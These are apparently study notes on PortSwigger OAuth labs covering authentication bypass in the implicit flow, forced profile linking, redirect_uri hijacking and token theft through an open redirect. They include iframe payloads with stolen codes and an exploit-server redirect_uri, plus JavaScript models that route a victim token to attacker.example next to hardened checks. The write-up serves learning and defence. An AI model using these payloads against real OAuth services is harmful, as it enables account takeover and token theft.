recon on the oauth server: fetch the discovery documents (they list the authorization/token endpoints, supported response_types and grant types, scopes, claims)
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
authentication bypass via oauth implicit flow
Log in with social media. Intercept the client's POST /authenticate (sent by the front end once the access token comes back in the URL fragment) and change the email field to the victim's email address. Works because the client builds the session from the identity in the request body instead of asking the oauth server who the token belongs to.
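Added example for these notes (not code from the lab or the original page): a model of the client's /authenticate handler in its vulnerable form next to a hardened one that derives the identity from the token owner. The userinfo table, token strings and email addresses are constructed.

```javascript
// Added example for these notes, not code from the lab or the original page.
// Models the implicit-flow client: the front end receives the access token in
// the URL fragment and POSTs {email, username, token} to /authenticate.
// The userinfo table, tokens and email addresses below are constructed.

// Stand-in for the oauth server's userinfo endpoint (token -> identity).
const USERINFO = {
  "tok-attacker": { sub: "attacker", email: "attacker@example.com" },
};

function userinfo(token) {
  return USERINFO[token] || null;
}

// Vulnerable: the session identity comes from the request body. The token is
// only checked for presence, so any valid token plus the victim's email wins.
function authenticateVulnerable(body) {
  if (!body.token) return { ok: false, reason: "missing token" };
  return { ok: true, session: { username: body.username, email: body.email } };
}

// Hardened: ask the oauth server who owns the token and build the session from
// that answer; a client-supplied identity that disagrees is refused.
function authenticateHardened(body) {
  const info = userinfo(body.token);
  if (!info) return { ok: false, reason: "token not recognised by oauth server" };
  if (body.email !== info.email) {
    return { ok: false, reason: "body identity does not match token owner" };
  }
  return { ok: true, session: { username: info.sub, email: info.email } };
}

// Constructed requests: the attacker's own token with the victim's email swapped
// in, and the unmodified request the attacker's browser would normally send.
const forgedRequest = { email: "victim@example.com", username: "victim", token: "tok-attacker" };
const legitRequest = { email: "attacker@example.com", username: "attacker", token: "tok-attacker" };
```

authenticateVulnerable(forgedRequest) yields a session for victim@example.com; authenticateHardened refuses it and only accepts the request whose email matches the token owner.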
forced oauth profile linking (no state parameter)
Log in with social media. Intercept the client's /oauth-linking?code=... callback and drop the request so the code is never redeemed, then deliver the code to the victim in an iframe:
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/oauth-linking?code=STOLEN-CODE"></iframe>
When the victim (already logged in to the client) loads it, the attacker's social profile is linked to the victim's account. Then log in with social media again to land in the victim's account.
account hijacking via redirect_uri
Log in with oauth, log out, log in again and intercept the GET /auth?client_id=... request. Change redirect_uri to your exploit server and forward it: if the flow still completes, the oauth server is not checking redirect_uri against the registered callback. Deliver this to the victim:
<iframe src="https://YOUR-LAB-OAUTH-SERVER-ID.web-security-academy.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.web-security-academy.net&response_type=code&scope=openid%20profile%20email"></iframe>
The victim's authorization code lands in the exploit server access log. Use it at the client's callback endpoint (the URL your own code was sent to when you logged in) to log in as the victim.
stealing access tokens via open redirect
redirect_uri validation that only checks a prefix of the registered callback can be chained with an open redirect on the client's domain (path-traverse out of the callback into the redirecting endpoint); in the implicit flow the browser carries the #access_token fragment through the redirect to the attacker. See portswigger.
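Added example for these notes (not code from the lab or the original page) covering both redirect_uri cases above: the authorization server's redirect_uri check in no-check, prefix-match and exact-match forms, and a model of what the victim's browser does with an implicit-flow redirect into an open redirect. The registered callback, hostnames, the open-redirect endpoint /post/next?path= and the token value are constructed.

```javascript
// Added example for these notes, not code from the lab or the original page.
// Authorization-server side redirect_uri check, plus a model of what the
// victim's browser does with the resulting redirect. The registered callback,
// hostnames, the open-redirect endpoint /post/next?path= and the token are constructed.
const REGISTERED_REDIRECTS = ["https://client.example/oauth-callback"];

// No check at all: the account-hijacking case, any redirect_uri is accepted.
const redirectAllowedNone = () => true;

// Weak: prefix match. Anything "under" the callback passes, including a
// path traversal that the browser will resolve to a different endpoint.
function redirectAllowedWeak(uri) {
  return REGISTERED_REDIRECTS.some((r) => uri.startsWith(r));
}

// Strict: exact match on both the raw string and the normalized form, so
// dot-segments, extra query strings and fragments are all rejected.
function redirectAllowedStrict(uri) {
  let parsed;
  try { parsed = new URL(uri); } catch { return false; }
  return REGISTERED_REDIRECTS.includes(uri) && REGISTERED_REDIRECTS.includes(parsed.href);
}

// Implicit flow: the oauth server answers with a redirect carrying the token in the fragment.
function authorizeImplicit(redirectUri, allowed, token) {
  if (!allowed(redirectUri)) return null; // invalid redirect_uri, no redirect issued
  return redirectUri + "#access_token=" + token;
}

// What the victim's browser does: resolve dot-segments, then follow the client's
// open redirect. Browsers keep the original fragment on a 3xx whose Location
// has none, so the token travels with it.
function browserFollow(url) {
  const u = new URL(url);
  if (u.hostname === "client.example" && u.pathname === "/post/next" && u.searchParams.get("path")) {
    const dest = new URL(u.searchParams.get("path"));
    dest.hash = u.hash;
    return dest.href;
  }
  return u.href;
}

// Attacker-supplied redirect_uri: registered prefix, then traversal into the open redirect.
const MALICIOUS_REDIRECT =
  "https://client.example/oauth-callback/../post/next?path=https://attacker.example/";

// Returns the URL the victim's browser finally lands on, or null if the
// oauth server refused the redirect_uri.
function stealTokenViaOpenRedirect(allowed) {
  const redirect = authorizeImplicit(MALICIOUS_REDIRECT, allowed, "tok-victim");
  return redirect === null ? null : browserFollow(redirect);
}
```

With the prefix check the chain ends at https://attacker.example/#access_token=tok-victim; with exact matching the oauth server never issues the redirect. The no-check variant does not even need the open redirect, since the attacker's own host is accepted directly.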